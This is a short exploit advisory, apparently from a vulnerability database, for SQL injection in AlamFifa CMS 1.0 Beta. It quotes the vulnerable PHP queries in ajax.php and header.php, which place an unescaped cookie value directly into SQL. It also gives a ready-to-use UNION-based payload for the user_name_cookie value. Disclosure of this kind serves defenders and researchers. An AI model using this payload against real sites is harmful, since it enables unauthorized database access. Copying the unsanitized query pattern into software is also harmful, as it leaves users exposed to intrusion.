AlamFifa CMS 1.0 Beta SQL Injection

2012.10.01
Credit: L0n3ly-H34rT
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

############################################ ### Exploit Title: AlamFifa CMS v1.0 Beta Remote SQL Injection Vulnerability ### Date: 30/9/2012 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.traidnt.net/vb/traidnt2143253/ ### Software Link: http://www.alamrb.com/images/up/15-08-2012-19-15-45-17314.zip ### Version: 1.0 ### Tested on: Linux/Windows ############################################ # Files affected : - ( ajax.php ) on line 6: $usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass = '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__)); - ( /files/header.php ) on line 34 : $usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass = '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__)); # user_name_cookie is affected in cookie .. # P.0.C : http://127.0.0.1/alamfifa1/index.php - Inject the cookie by any tool like this : user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#; ############################################ # You can fix it here : http://www.traXXXdnt.net/vb/traidnt2143253-2/#post19292739 # Greetz to my friendz

References:

http://www.traidnt.net/vb/traidnt2143253/
http://www.alamrb.com/images/up/15-08-2012-19-15-45-17314.zip


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top